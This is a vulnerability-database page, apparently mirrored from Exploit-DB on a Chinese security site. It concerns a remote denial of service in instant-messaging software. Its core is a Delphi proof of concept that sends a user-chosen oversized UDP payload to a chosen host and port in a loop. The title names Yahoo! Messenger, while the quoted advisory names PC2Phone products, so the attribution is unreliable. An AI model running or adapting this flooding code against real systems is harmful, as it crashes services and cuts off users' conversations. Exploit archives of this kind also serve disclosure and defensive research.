Yahoo! Messenger 4.0/5.0 – Remote Denial of Service

Yahoo! Messenger 4.0/5.0 – Remote Denial of Service

漏洞ID 1054129 漏洞类型
发布时间 2003-09-01 更新时间 2003-09-01
图片[1]-Yahoo! Messenger 4.0/5.0 – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-Yahoo! Messenger 4.0/5.0 – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23086
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8523/info

It has been reported that multiple PC2Phone products are prone to a remote denial of service condition. The problem is said to occur when processing excessive data passed to the programs via a UDP packet and could result in the product crashing. This could result in an established conversation prematurely ending, or potentially other attacks.

The precise technical details regarding this issue are currently unknown, however as further information is made available this bid will be updated accordingly. 

procedure TForm1.Button1Click(Sender: TObject);
var C:string;
N:integer;
MyStream:TMemoryStream;
begin
Memo1.Lines.Add('start');
C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
N:=strtoint(Edit4.Text);
NMUDP1.RemoteHost:=Edit1.Text;
NMUDP1.RemotePort:=strtoint(Edit2.Text);
MyStream:=TMemoryStream.Create;
try
MyStream.Write(C[1],Length(C));
for n:=1 to N do
begin
NMUDP1.SendStream(MyStream);
end;
finally
MyStream.Free;
end;
Memo1.Lines.Add('finish');
end;

相关推荐: Handspring Visor服务拒绝漏洞

Handspring Visor服务拒绝漏洞 漏洞ID 1205155 漏洞类型 未知 发布时间 2001-10-22 更新时间 2001-10-22 CVE编号 CVE-2001-1438 CNNVD-ID CNNVD-200110-118 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享